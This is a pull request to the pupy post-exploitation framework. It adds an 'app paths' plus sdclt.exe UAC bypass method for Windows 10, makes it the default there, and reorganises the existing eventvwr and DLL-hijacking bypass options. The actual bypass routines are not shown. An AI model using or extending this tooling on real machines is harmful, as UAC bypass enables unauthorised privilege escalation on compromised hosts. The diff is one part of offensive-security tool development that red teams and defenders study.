### PR TITLE
Updates in Bypass UAC

### DIFF
--- a/pupy/modules/bypassuac.py
+++ b/pupy/modules/bypassuac.py
@@ -17,7 +17,7 @@ class BypassUAC(PupyModule):
     
     def init_argparse(self):
         self.arg_parser = PupyArgumentParser(prog="bypassuac", description=self.__doc__)
-        self.arg_parser.add_argument('-m', dest='method', choices=["eventvwr", "dll_hijacking"], default=None, help="Default: the technic will be choosen for you. 'dll_hijacking' for wind7-8.1 and 'eventvwr' for wind7-10.")
+        self.arg_parser.add_argument('-m', dest='method', choices=["appPaths","eventvwr", "dll_hijacking"], default=None, help="By default, the method will be choosen for you: 'eventvwr' for wind7-8.1 and 'appPaths' for wind10. dll_hijacking method can be used for Windows 7/2008 and Windows 8/2012")
 
     def run(self, args):
         # check if a UAC Bypass can be done
@@ -25,25 +25,31 @@ class BypassUAC(PupyModule):
             self.error('Your are not on the local administrator group.')
             return
 
-        dll_hijacking = False
-        registry_hijacking = False
+        appPathsMethod = False
+        eventvwrMethod = False
+        dllhijackingMethod = False
 
         bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
         # choose methods depending on the OS Version
         if not args.method:
             if self.client.desc['release'] == '10':
-                registry_hijacking = True
+                appPathsMethod = True
             else:
-                dll_hijacking = True
+                dllhijackingMethod = True
+        elif args.method == "appPathsMethod":     
+            appPathsMethod = True
         elif args.method == "eventvwr":     
-            registry_hijacking = True
-        else:
-            dll_hijacking = True
+            eventvwrMethod = True
+        elif args.method == "dll_hijacking":     
+            dllhijackingMethod = True
 
-        if registry_hijacking:
+        if appPathsMethod:
+            self.success("Trying to bypass UAC using the 'app paths'+'sdclt.exe' method, wind10 targets ONLY...")
+            bypassUasModule.bypassuac_through_appPaths()
+        if eventvwrMethod:
             self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
-            bypassUasModule.bypassuac_through_EventVwrBypass()
-        elif dll_hijacking:
+            bypassUasModule.bypassuac_through_eventVwrBypass()
+        if dllhijackingMethod:
             # Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
             self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
-            bypassUasModule.bypassuac_through_PowerSploitBypassUAC()
+            bypassUasModule.bypassuac_through_powerSploitBypassUAC()

--- a/pupy/modules/lib/windows/bypassuac.py
+++ b/pupy/modules/lib/windows/bypassuac.py
@@ -43,15 +43,7 @@ class bypassuac():
         Performs an UAC bypass attack by using app Paths + sdclt.exe (Wind10 Only): Thanks to enigma0x3 (https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/).
         '''
         self.module.info('Running app Paths method for bypassing UAC...')
-        if '64' in self.module.client.desc['os_arch'] and '64' in self.module.client.desc['proc_arch']:
-            self.module.info('Current process: 64bits, System arch: 64bits, continue...')
-        elif '64' in self.module.client.desc['os_arch'] and '32' in self.module.client.desc['proc_arch']:
-            self.module.error('Current process: 64bits, System arch: 32bits, impossible to execute sdclt.exe in this configuration. ABORDING...')
-            self.module.error('You have to migrate to a 64 bits process before')
-            return
-        elif '32' in self.module.client.desc['os_arch'] and '32' in self.module.client.desc['proc_arch']:
-            self.module.info('Current process: 32bits, System arch: 32bits, continue...')
-        if '64' in self.module.client.desc['proc_arch']:
+        if '64' in self.module.client.desc['os_arch']:
             force_x86_dll = False
         else:
             force_x86_dll = True


### PR DESCRIPTION
- New method for bypassing UAC on Wind10: "**app Paths**" + "**sdclt.exe**". 
    - Thanks to  **enigma0x3** ([https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/](https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/)). 
    - When the user is in a 32bits process, he has to move to a 64 bits process before using this method. 
    - Notice pupy has to run in a 64bits process for executing sdclt.exe: If you are in a 32 bits process, you are not able to see and execute sdclt.exe binary on Wind10 (tested on my wind10 version).
     - This method is now by default for wind10 targets.